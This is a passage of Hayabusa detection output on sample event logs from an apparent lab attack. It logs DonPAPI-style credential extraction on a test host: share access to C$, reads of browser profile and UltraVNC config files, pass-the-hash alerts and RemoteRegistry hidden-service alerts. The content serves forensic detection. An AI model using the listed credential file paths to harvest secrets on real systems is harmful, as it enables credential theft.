0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.127 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 
+00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.189 
+00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 
0x87249a8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.269 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - 
Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.333 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network 
Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.382 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.476 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 
%%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
